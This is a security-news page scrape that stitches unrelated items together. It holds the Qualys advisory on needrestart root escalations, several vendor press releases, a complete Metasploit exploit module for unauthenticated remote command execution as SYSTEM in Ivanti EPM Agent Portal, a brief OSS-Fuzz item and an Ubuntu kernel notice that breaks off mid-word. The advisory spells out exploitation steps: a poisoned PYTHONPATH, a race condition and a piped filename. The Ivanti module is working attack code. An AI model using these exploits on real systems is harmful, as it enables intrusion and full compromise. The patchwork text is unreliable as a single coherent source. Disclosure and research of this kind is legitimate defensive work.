Qualys discovered that needrestart suffers from multiple local privilege escalation vulnerabilities that allow for root access from an unprivileged user.

  
Qualys Security Advisory

LPEs in needrestart (CVE-2024-48990, CVE-2024-48991, CVE-2024-48992,  
CVE-2024-10224, and CVE-2024-11003)

========================================================================  
Contents  
========================================================================

Summary  
Background  
CVE-2024-48990 (and CVE-2024-48992)  
CVE-2024-48991  
CVE-2024-10224 (and CVE-2024-11003)  
Mitigation  
Acknowledgments  
Timeline

    I got bugs  
    I got bugs in my room  
    Bugs in my bed  
    Bugs in my ears  
    Their eggs in my head  
        -- Pearl Jam, "Bugs"

========================================================================  
Summary  
========================================================================

needrestart (from https://github.com/liske/needrestart) is a Perl tool  
that is installed by default on Ubuntu Server since version 21.04. From  
https://discourse.ubuntu.com/t/needrestart-changes-in-ubuntu-24-04-service-restarts:

------------------------------------------------------------------------  
  What is needrestart, exactly?

  needrestart is a tool that probes your system to see if either the  
  system itself or some of its services should be restarted. That last  
  part is the one of interest in this document. Notably, a service is  
  considered as needing to be restarted if one of its processes is using  
  a shared library whose initial file isn't on the system anymore (for  
  instance, if it has been overwritten by a new version as part of a  
  package update).

  We ship this tool in our server images, and it is configured by  
  default to run at the end of APT transactions, e.g. when doing apt  
  install/upgrade/remove or during unattended-upgrades.  
------------------------------------------------------------------------

We discovered three fundamental vulnerabilities in needrestart (three  
LPEs, Local Privilege Escalations, from any unprivileged user to full  
root), which are exploitable without user interaction on Ubuntu Server  
(through unattended-upgrades):

- CVE-2024-48990: local attackers can execute arbitrary code as root by  
  tricking needrestart into running the Python interpreter with an  
  attacker-controlled PYTHONPATH environment variable.

  Last-minute update: an additional CVE, CVE-2024-48992, has been  
  assigned to needrestart because local attackers can also execute  
  arbitrary code as root by tricking needrestart into running the Ruby  
  interpreter with an attacker-controlled RUBYLIB environment variable.

- CVE-2024-48991: local attackers can execute arbitrary code as root by  
  winning a race condition and tricking needrestart into running their  
  own, fake Python interpreter (instead of the system's real Python  
  interpreter).

- CVE-2024-10224: local attackers can execute arbitrary shell commands  
  as root by tricking needrestart into open()ing a filename of the form  
  "commands|" (technically, this vulnerability is in Perl's ScanDeps  
  module, but it is unclear whether this module was ever meant to  
  operate on attacker-controlled files or not).

  Last-minute update: in the end, an additional CVE, CVE-2024-11003, has  
  been assigned to needrestart for calling Perl's ScanDeps module with  
  attacker-controlled files.

To the best of our knowledge, these vulnerabilities have existed since  
the introduction of interpreter support in needrestart 0.8 (April 2014).  
>From https://github.com/liske/needrestart#interpreters:

------------------------------------------------------------------------  
  needrestart 0.8 brings an interpreter scanning feature. Interpreters  
  not only map binary (shared) objects but also use plaintext source  
  files. The interpreter detection tries to check for outdated source  
  files since they may contain security issues, too. This is only a  
  heuristic and might fail to detect all relevant source files. The  
  following interpreter scanners are shipped:

  - NeedRestart::Interp::Java  
  - NeedRestart::Interp::Perl  
  - NeedRestart::Interp::Python  
  - NeedRestart::Interp::Ruby  
------------------------------------------------------------------------

We will not publish our exploits for now; however, please note that  
these vulnerabilities are trivially exploitable, and other researchers  
might publish working exploits shortly after this coordinated release.

========================================================================  
Background  
========================================================================

    And now the questions:  
    Do I kill them?  
    Become their friend?  
    Do I eat them?  
        -- Pearl Jam, "Bugs"

While idly watching an "apt-get upgrade" of one of our Ubuntu Servers,  
we noticed a message that we had never noticed before: "Scanning  
processes..."

We immediately wondered: What is printing this message? Is it scanning  
userland processes? As root? Even processes that do not belong to root?

We quickly found out that this message is printed by needrestart, a tool  
that scans the userland for processes that need to be restarted after a  
package installation, upgrade, or removal. Naturally, needrestart scans  
all userland processes as root, including unprivileged user processes;  
i.e., possibly attacker-controlled processes.

========================================================================  
CVE-2024-48990 (and CVE-2024-48992)  
========================================================================

To determine whether a Python process (a process that is running the  
Python interpreter) needs to be restarted, needrestart extracts the  
PYTHONPATH environment variable from this process's /proc/pid/environ  
(at line 193), sets this environment variable if it exists (at line  
196), and executes Python ("$ptable->{exec}" at line 203) with a "-"  
argument to read a short, hard-coded script from stdin (at line 204):

------------------------------------------------------------------------  
135 sub files {  
136     my $self = shift;  
137     my $pid = shift;  
138     my $cache = shift;  
139     my $ptable = nr_ptable_pid($pid);  
...  
193     my %e = nr_parse_env($pid);  
194     local %ENV;  
195     if(exists($e{PYTHONPATH})) {  
196         $ENV{PYTHONPATH} = $e{PYTHONPATH};  
197     }  
...  
203     my ($pyread, $pywrite) = nr_fork_pipe2($self->{debug}, $ptable->{exec}, '-');  
204     print $pywrite "import sys\nprint(sys.path)\n";  
205     close($pywrite);  
------------------------------------------------------------------------

Unfortunately, if a Python process belongs to a local attacker, then  
needrestart executes Python (at line 203) with an attacker-controlled  
PYTHONPATH environment variable, which allows the attacker to execute  
arbitrary code as root (even though needrestart's hard-coded Python  
script at line 204 is not attacker-controlled at all). This is  
CVE-2024-48990.

For example, in our exploit we run a simple Python process (which  
sleep()s forever) with a "PYTHONPATH=/home/jane" environment variable,  
and plant a shared library "importlib/__init__.so" in our /home/jane.  
As soon as needrestart executes Python with our PYTHONPATH environment  
variable (at line 203), our shared library is executed (by Python's  
initialization code) and creates a SUID-root shell in /home/jane.

Note: needrestart's support code for the Ruby interpreter seems equally  
vulnerable, but we have not investigated this any further, because  
(unlike Python) Ruby is not installed by default on Ubuntu Server.

Last-minute update: we have now confirmed that needrestart's support  
code for the Ruby interpreter is indeed vulnerable and exploitable,  
through an attacker-controlled RUBYLIB environment variable and an  
"enc/encdb.so" shared library. This is CVE-2024-48992.

========================================================================  
CVE-2024-48991  
========================================================================

To determine whether a process is indeed a Python process (a process  
that is running the Python interpreter, for example /usr/bin/python3),  
needrestart reads this process's /proc/pid/exe (at line 520), and then  
matches it against the regular expression at line 45:

------------------------------------------------------------------------  
 520         my $exe = nr_readlink($pid);  
 ...  
 606             $restart++ if(needrestart_interp_check($nrconf{verbosity} > 1, $pid, $exe, $nrconf{blacklist_interp}, $opt_t));  
------------------------------------------------------------------------  
166 sub needrestart_interp_check($$$$$) {  
167     my $debug = shift;  
168     my $pid = shift;  
169     my $bin = shift;  
170     my $blacklist = shift;  
171     my $tolerance = shift;  
...  
176         if($interp->isa($pid, $bin)) {  
------------------------------------------------------------------------  
 40 sub isa {  
 41     my $self = shift;  
 42     my $pid = shift;  
 43     my $bin = shift;  
 44   
 45     return 1 if($bin =~ m@^/usr/(local/)?bin/python([23][.\d]*)?$@);  
 46   
 47     return 0;  
 48 }  
------------------------------------------------------------------------

In fact, this code used to be vulnerable to CVE-2022-30688, a Local  
Privilege Escalation reported by Jakub Wilk: the regular expression at  
line 45 used to be unanchored (i.e., "/usr/(local/)?bin/python" instead  
of "^/usr/(local/)?bin/python([23][.\d]*)?$"), so local attackers could  
simply run their own, fake "/home/jane/usr/bin/python" (for example) and  
needrestart would later execute this fake Python interpreter as root (as  
if it were the system's real Python interpreter, at line 203).

We tried to bypass the fixed, anchored regular expression at line 45,  
but we failed. However, we eventually realized that the filename that is  
checked at line 45 is not necessarily the same filename that is executed  
at line 203: the filename that is checked is read from /proc/pid/exe in  
the middle of needrestart's main loop (at line 520), but the filename  
that is executed ("$ptable->{exec}" at line 203) was first read from  
/proc/pid/exe long before needrestart entered its main loop.

In other words, needrestart is vulnerable to a TOCTOU race condition  
(time-of-check, time-of-use). For example, our exploit /home/jane/race  
waits for needrestart to read our /proc/pid/exe for the first time (we  
use inotify to reliably win this race), and then quickly execve()s the  
system's real Python interpreter with a script that simply sleep()s for  
some time. As a result, needrestart does its checks on the real Python  
interpreter, but executes our own /home/jane/race instead, as root.

Note: needrestart's support code for the Ruby interpreter seems equally  
vulnerable, but we have not investigated this any further.

========================================================================  
CVE-2024-10224 (and CVE-2024-11003)  
========================================================================

After we had discovered CVE-2024-48990 and CVE-2024-48991 in  
needrestart's support code for the Python interpreter (and Ruby), we  
began to wonder whether the support code for the Perl interpreter might  
also be vulnerable to a Local Privilege Escalation.

Unlike needrestart's support code for Python and Ruby, the support code  
for Perl does not execute the Perl interpreter itself: instead, it calls  
the scan_deps() function from Perl's ScanDeps module, which analyzes a  
Perl script by recursively reading its source files.

We therefore grepped the ScanDeps module for one of the oldest pitfalls  
of the Perl programming language: the two-argument form of open(), which  
allows attackers to execute arbitrary shell commands if they control the  
name of the file to be open()ed (for example, "commands|"). For more  
information, please refer to rain.forest.puppy's 1999 Phrack article  
("That pesky pipe" section) and the SEI CERT Perl Coding Standard:

  https://phrack.org/issues/55/7.html#article  
  https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890543

Incredibly, we found a match, at line 871 in ScanDeps.pm:

------------------------------------------------------------------------  
 868 sub scan_file{  
 869     my $file = shift;  
 870     my %found;  
 871     open my $fh, $file or die "Cannot open $file: $!";  
------------------------------------------------------------------------

In our exploit, we simply run a Perl script named "/home/jane/perl|"  
(which sleep()s forever), and as soon as needrestart calls scan_deps()  
to analyze our script, "/home/jane/perl|" is open()ed (at line 871), but  
because this filename ends with a "|" it is treated as a shell command,  
and our own "/home/jane/perl" is executed instead, as root.

Last-minute update: while reviewing needrestart's patches for these  
vulnerabilities, we have discovered that Perl's ScanDeps module is also  
trivially exploitable through various calls to eval() ("string" eval()s,  
https://perldoc.perl.org/functions/eval). Consequently and impressively,  
in response to our advisory:

- all of ScanDeps's vulnerable calls to open() and eval() have been  
  patched, thus fixing CVE-2024-10224;

- needrestart's dependence on ScanDeps has been completely removed (it  
  uses a simple regex-based approach now), thus fixing CVE-2024-11003.

========================================================================  
Mitigation  
========================================================================

As already recommended by needrestart's advisory for CVE-2022-30688  
(from https://www.openwall.com/lists/oss-security/2022/05/17/9):

------------------------------------------------------------------------  
Disabling the interpreter heuristic in needrestart's config prevents  
this attack:

 # Disable interpreter scanners.  
 $nrconf{interpscan} = 0;  
------------------------------------------------------------------------

========================================================================  
Acknowledgments  
========================================================================

We thank needrestart's maintainer (Thomas Liske), Module::ScanDeps's  
maintainers (Roderich Schupp in particular), the Ubuntu Security Team  
(Mark Esler in particular), and distros@openwall (Salvatore Bonaccorso  
from the Debian Security Team in particular) for their outstanding work;  
it has been a real pleasure to collaborate on this coordinated release.

We also thank Adam Boileau (@metlstorm) and Rodrigo Branco (@bsdaemon)  
for their very kind words about our work; they mean the world to us:

  https://risky.biz/RB755/  
  https://phrack.org/issues/71/2.html#article

========================================================================  
Timeline  
========================================================================

2024-10-04: We sent our advisory and exploits to the Ubuntu Security  
Team, and asked them if they could help us to coordinate this disclosure  
with the upstream projects and distros@openwall; they gladly accepted.

2024-10-08: The Ubuntu Security Team sent our advisory and exploits to  
needrestart's maintainer; we then started a very constructive exchange  
of patches and patch reviews.

2024-10-18: The Ubuntu Security Team opened GHSA-g597-359q-v529, a  
private GitHub repository to collaborate on this disclosure with  
Module::ScanDeps's maintainers.

2024-11-11: The Ubuntu Security Team sent our advisory and all of  
needrestart's and Module::ScanDeps's patches to distros@openwall.

2024-11-19: Coordinated Release Date (16:00 UTC).

needrestart Local Privilege Escalation

PRESS RELEASE

TEMPE, Ariz. and PRAGUE, Nov. 21, 2024 /PRNewswire/ -- Norton, a leading Cyber Safety brand of Gen™ (NASDAQ: GEN), has launched the new Norton Small Business Premium, an all-in-one, easy-to-use cybersecurity plan specifically designed for entrepreneurs and small businesses. In addition to powerful device security, Norton Small Business Premium features 24/7 Business Tech Support, Financial Monitoring, Social Media Monitoring and more.

"More than half (56%)\* of small business owners report that cybersecurity threats impact their business. Unfortunately, not enough of these entrepreneurs and small businesses have cybersecurity in place, often due to their cost and complexity," said Leena Elias, Chief Product Officer at Gen. "Norton Small Business Premium not only takes the work out of securing your business, we also help when other IT issues crop up."

Cybersecurity is crucial for businesses to protect their sensitive data, networks, and digital assets from cyberthreats that can lead to unauthorized access to company networks, data breaches, financial losses, and reputation damage. To help protect businesses where they need it most, Norton Small Business Premium includes features such as:

*   24/7 Business Tech Support: Subscriptions include access to Norton experts five time as year. These experts are available 24/7 for remote IT support on your devices, network, and software.
    
*   Financial Monitoring: Get alerts so you can act quickly if we detect suspicious transactions on your company's bank accounts.   
    
*   Social Media Monitoring: Prevent your business social media profiles from being taken over by regularly monitoring for suspicious activities on your accounts. 
    
*   Device Security: Real-time antivirus helps protect your devices, and our firewall\* helps block cybercriminals from accessing your network.
    
*   Secure VPN: Work online and access websites more safely at home or on the go with bank-grade VPN encryption.
    
*   Additional features include Password Manager, Cloud Backup, performance enhancements and more.
    

Norton Small Business Premium doesn't require an IT specialist or cybersecurity knowledge to use. It's easy to install and runs seamlessly in the background on Windows, Mac, Android, and iOS, allowing you to focus on your business without slowing down operations. 

Norton recommends 10 tips for small business Cyber Safety: 

1.  Learn to spot signs of phishing and teach your employees
    
2.  Only click links or download attachments from known sources
    
3.  Avoid sharing personal information or private company data over email
    
4.  Always keep your operating system, applications, and drivers up-to-date
    
5.  Make sure your WiFi network is protected with a strong password
    
6.  Regularly back up your data
    
7.  Require employees to use a VPN when doing company work on a public WiFi network (think airports and coffee shops)
    
8.  Always use multi-factor-authentication for an extra layer of protection
    
9.  Don't neglect mobile devices – make sure they are password protected and use security software
    
10.  Invest in a cybersecurity solution such as Norton Small Business Premium
    

Norton Small Business Premium is available now with prices starting at $299.99/year with options for 6, 10 or 20-device plans. For more information, please visit norton.com/products/small-business.

About Norton   
Norton is a leading Cyber Safety brand of Gen™ (NASDAQ: GEN), a global company dedicated to powering Digital Freedom through its family of trusted consumer brands including Norton, Avast, LifeLock, Avira, AVG, ReputationDefender and CCleaner. Gen empowers people to live their digital lives safely, privately, and confidently today and for generations to come. Gen brings award-winning products and services in cybersecurity, online privacy and identity protection to more than 500 million users in more than 150 countries. Learn more at Norton.com and GenDigital.com.

You May Also Like

Norton Introduces Small Business Premium for Business-Grade Security

PRESS RELEASE

New York City, NY. November 21, 2024 – Apono, the leader in privileged access for the cloud, today announced an update to the Apono Cloud Access Platform that enables users to automatically discover and revoke standing access to resources across their cloud environments. Users can then create guardrails for sensitive resources, allowing Apono to process and assess access requests, and quickly provide Just-in-Time, Just-Enough access to users when needed. Today’s update will be available across all three major cloud service providers, with AWS being the first to launch, followed by Azure and Google Cloud Platform. 

“Today’s update enriches the Apono Cloud Access Platform’s unique combination of automated discovery, assessment, management, and enforcement capabilities,” said Rom Carmel, CEO and Co-founder of Apono. “With deep visibility across the cloud, seamless permission revocation, and automated Just-in-time, Just-Enough Access, we eliminate one of the largest risks organizations face while ensuring development teams can innovate rapidly with seamless access within secure guardrails. This powerful combination is essential for modern businesses, unlocking a new level of security and productivity for our customers.” 

Standing access within the cloud has long been a prime target for cybercriminals, enabling them to swiftly escalate both horizontally and vertically during a breach. However, security teams have lacked complete visibility over existing standing access, leaving critical vulnerabilities across the user base. Additionally, security teams have been reluctant to revoke existing standing access due to the risk of impacting users' day-to-day needs, which can ultimately lead to significantly hampering business operations across the organization.  

Today’s update allows users to overcome this challenge by enabling security teams to: 

Gain complete visibility over user permissions, identifying 100% of standing user entitlements in the cloud and where high-risk, standing privileges exist. 

Confidently and seamlessly remove 95% of standing entitlements without impacting business operations.  

Use critical insights on high-risk permissions to inform remediation plans, guide administrators in establishing access flows, and automatically grant Just-in-Time, Just-Enough access to cloud resources for only the required duration before access is revoked again. 

“Over-privileged access is one of the most significant risks to identity security that organizations face today, and it's made even more challenging to manage by expanding cloud environments. At the same time, to keep pace, organizations need to grant permissions dynamically to support day-to-day work. This creates a complex obstacle: how can an organization grant the necessary access for productivity while also enhancing its identity security?” said Simon Moffatt, Founder and Analyst, The Cyber Hut, “With this in mind, delivering Just-in-Time and Just-Enough Access across cloud services should be the goal of modern identity management. An approach to solve this will help companies significantly reduce their attack surface while ensuring a seamless access experience for their workforce.” 

Apono will provide in-person demonstrations of today's update and the complete Apono Cloud Access Platform at AWS re:Invent from December 2-6. Click here to learn more.  

For more information, visit the Apono website here: www.apono.io. 

You May Also Like

Apono Enhances Platform Enabling Permission Revocation and Automated Access

MIAMI, Florida, 21st November 2024, CyberNewsWire

**MIAMI, Florida, November 21st, 2024, CyberNewsWire**

Halo Security, a leader in external attack surface management and penetration testing, has announced the launch of its new Slack® app, empowering cybersecurity teams to receive real-time alerts on newly discovered assets, vulnerabilities, and other essential security updates directly within the Slack collaboration software.

This new integration allows Halo Security’s customers to seamlessly incorporate important security notifications into their existing Slack workflows, improving response time and enhancing collaboration across security and IT teams. Previously, Halo Security offered Slack alerts through a Zapier integration, but this new, direct integration delivers a more streamlined experience, giving customers greater control with minimal configuration.

Halo Security’s platform offers comprehensive external attack surface management, encompassing asset discovery, risk and vulnerability assessment, and penetration testing in a single, user-friendly dashboard. Built by a team of experienced penetration testers, security engineers, and reformed hackers, Halo Security provides organizations with an attacker’s perspective to help identify and address vulnerabilities. With the new Slack integration, customers are notified as soon as new issues and vulnerabilities are detected, unknown assets or open ports are discovered, and new technologies appear on their websites, helping teams stay ahead of emerging threats without being overwhelmed by irrelevant alerts.

> “Organizations need real-time, customized alerts for emerging security threats, but too many notifications can lead to alert fatigue,” said Ben Tyler, CTO of Halo Security. “Our direct Slack integration is easily configurable, giving customers precise control over which alerts they receive and allowing them to focus on the most critical issues directly within their existing workflows.”

**How to Get Started with Halo Security’s Slack Integration**

Halo Security customers can activate the Slack app today directly from their accounts. New users interested in trying the Halo Security platform can sign up for a 7-day free trial at halosecurity.com.

**About Halo Security**

Halo Security is a comprehensive external attack surface management platform that provides asset discovery, risk assessment, and penetration testing in a single, easy-to-use dashboard. Founded by cybersecurity experts with backgrounds at McAfee, Intel, Kenna Security, OneLogin, and WhiteHat Security, Halo Security delivers a unique attacker-based approach to help organizations safeguard against potential threats. Users can learn more at halosecurity.com.

Slack is a registered trademark and service mark of Slack Technologies, Inc.

**Contact**

**VP of Marketing**  
**Nicholas Hemenway**  
**Halo Security**  
**\[email protected\]**

Halo Security Launches Slack Integration for Real-Time Alerts on New Assets and Vulnerabilities

This Metasploit module leverages an unauthenticated remote command execution vulnerability in Ivanti's EPM Agent Portal where an RPC client can invoke a method which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM. This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkrequire 'rex/proto/ms_nrtp/client'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::Tcp  Rank = ExcellentRanking  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti EPM Agent Portal Command Execution',        'Description' => %q{          This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method          which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM.          This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.        },        'Author' => [          'James Horseman', # original poc          'Zach Hanley', # original poc          'Spencer McIntyre' # metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-28324'],          ['URL', 'https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US'],          ['URL', 'https://github.com/horizon3ai/CVE-2023-28324'],        ],        'Platform' => 'win',        'Arch' => ARCH_CMD,        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-06-07', # Ivanti article created date        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options([      Opt::RPORT(nil, true, 'The target port is not static. For more info, see this module\'s Verifications Steps in the docs.'),    ])    deregister_options('SSL')  end  def check    cwd = execute_command('echo %cd%', 0)    return CheckCode::Safe('Command execution failed.') unless cwd.to_s =~ /.:\\Windows\\System32/i    CheckCode::Vulnerable("Command execution test succeeded. Current working directory: #{cwd}")  rescue Rex::SocketError => e    CheckCode::Safe("MS-NRTP connection failed. #{e.class}: #{e.message}")  end  def exploit    execute_command(payload.raw)  end  def execute_command(command, result_delay = -1)    if @nrtp_client.nil?      @nrtp_client = client = IAgentPortal.new(        datastore['RHOST'],        datastore['RPORT'],        'LANDeskAgentPortal/LDSM',        context: { 'Msf' => framework, 'MsfExploit' => self }      )      client.connect      vprint_status('Connected to the remote end point')    else      client = @nrtp_client    end    client.do_request(command)    return nil unless result_delay >= 0    sleep result_delay    client.do_get_result  endendclass IAgentPortal < Rex::Proto::MsNrtp::Client  def recv_binary    Msf::Util::DotNetDeserialization::Types::SerializedStream.read(recv)  end  def send_recv_binary(serialized_stream)    send_binary(serialized_stream)    recv_binary  end  def do_request(shell_command)    ss_response = send_recv_binary(ss_request(shell_command))    method_return = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodReturn] }    method_return.record_value.return_value.val.value  end  def do_get_result    ss_response = send_recv_binary(ss_get_result)    ass = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleString] }    return nil unless ass    ass.record_value.members.first.record_value.string.value  end  private  def ss_get_result    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { major_version: 1 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              no_context: 1,              args_inline: 1            },            method_name: 'GetResult',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb',            args: [{ primitive_type_enum: Msf::Util::DotNetDeserialization::Enums::PrimitiveTypeEnum[:String], val: 'localhost' }]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd] }      ]    })  end  def ss_request(shell_command)    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { root_id: 1, header_id: -1, major_version: 1, minor_version: 0 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              method_signature_in_array: 1,              no_context: 1,              args_in_array: 1            },            method_name: 'Request',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb'          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 1, member_count: 2 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 2 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 3 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 2, member_count: 4 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 4, string: 'localhost' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 5 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 6, string: 'cmd.exe' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 7, string: "/c #{shell_command}" } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryArray], record_value: { obj_id: 3, binary_array_type_enum: 0, rank: 1, lengths: [4], type_enum: 3, additional_type_info: 'System.Type' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 9 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryLibrary], record_value: { library_id: 11, library_name: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 5, name: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum', member_count: 1, member_names: ['value__'] },            member_type_info: { binary_type_enums: [0], additional_infos: [8] },            library_id: 11,            member_values: [1]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SystemClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 8, name: 'System.UnitySerializationHolder', member_count: 3, member_names: ['Data', 'UnityType', 'AssemblyName'] },            member_type_info: { binary_type_enums: [1, 0, 1], additional_infos: [8] },            member_values: [{ record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 12, string: 'System.String' } }, 4, { record_type: 6, record_value: { obj_id: 13, string: 'mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' } }]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithId],          record_value: {            obj_id: 9,            metadata_id: 8,            member_values: [              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 14, string: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum' } },              4,              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 15, string: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } }            ]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd], record_value: {} }      ]    })  endend

Ivanti EPM Agent Portal Command Execution

Google has revealed that its AI-powered fuzzing tool, OSS-Fuzz, has been used to help identify 26 vulnerabilities in various open-source code repositories, including a medium-severity flaw in the OpenSSL cryptographic library.
"These particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets,"

Google's AI-Powered OSS-Fuzz Tool Finds 26 Vulnerabilities in Open-Source Projects

Ubuntu Security Notice 7123-1 - It was discovered that the CIFS network file system implementation in the Linux kernel did not properly validate certain SMB messages, leading to an out-of-bounds read vulnerability. An attacker could use this to cause a denial of service or possibly expose sensitive information. Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, and Shweta Shinde discovered that the Confidential Computing framework in the Linux kernel for x86 platforms did not properly handle 32-bit emulation on TDX and SEV. An attacker with access to the VMM could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-7123-1November 20, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate certain SMB messages, leading to anout-of-bounds read vulnerability. An attacker could use this to cause adenial of service (system crash) or possibly expose sensitive information.(CVE-2023-6610)Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, andShweta Shinde discovered that the Confidential Computing framework in theLinux kernel for x86 platforms did not properly handle 32-bit emulation onTDX and SEV. An attacker with access to the VMM could use this to cause adenial of service (guest crash) or possibly execute arbitrary code.(CVE-2024-25744)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - MIPS architecture;  - PowerPC architecture;  - RISC-V architecture;  - User-Mode Linux (UML);  - x86 architecture;  - Block layer subsystem;  - Android drivers;  - Serial ATA and Parallel ATA drivers;  - ATM drivers;  - Drivers core;  - Null block device driver;  - Character device driver;  - ARM SCMI message protocol;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - I3C subsystem;  - InfiniBand drivers;  - Input Device core drivers;  - Input Device (Miscellaneous) drivers;  - IOMMU subsystem;  - IRQ chip drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Device tree and open firmware driver;  - Parport drivers;  - PCI subsystem;  - Pin controllers subsystem;  - Remote Processor subsystem;  - S/390 drivers;  - SCSI drivers;  - QCOM SoC drivers;  - Direct Digital Synthesis drivers;  - Thunderbolt and USB4 drivers;  - TTY drivers;  - Userspace I/O drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Host Controller drivers;  - USB Type-C Connector System Software Interface driver;  - USB over IP driver;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - NILFS2 file system;  - NTFS3 file system;  - Proc file system;  - SMB network file system;  - Core kernel;  - DMA mapping infrastructure;  - RCU subsystem;  - Tracing infrastructure;  - Radix Tree data structure library;  - Kernel userspace event delivery library;  - Objagg library;  - Memory management;  - Amateur Radio drivers;  - Bluetooth subsystem;  - Ethernet bridge;  - CAN network layer;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - KCM (Kernel Connection Multiplexor) sockets driver;  - MAC80211 subsystem;  - Multipath TCP;  - Netfilter;  - Network traffic control;  - SCTP protocol;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Wireless networking;  - AppArmor security module;  - Landlock security;  - Simplified Mandatory Access 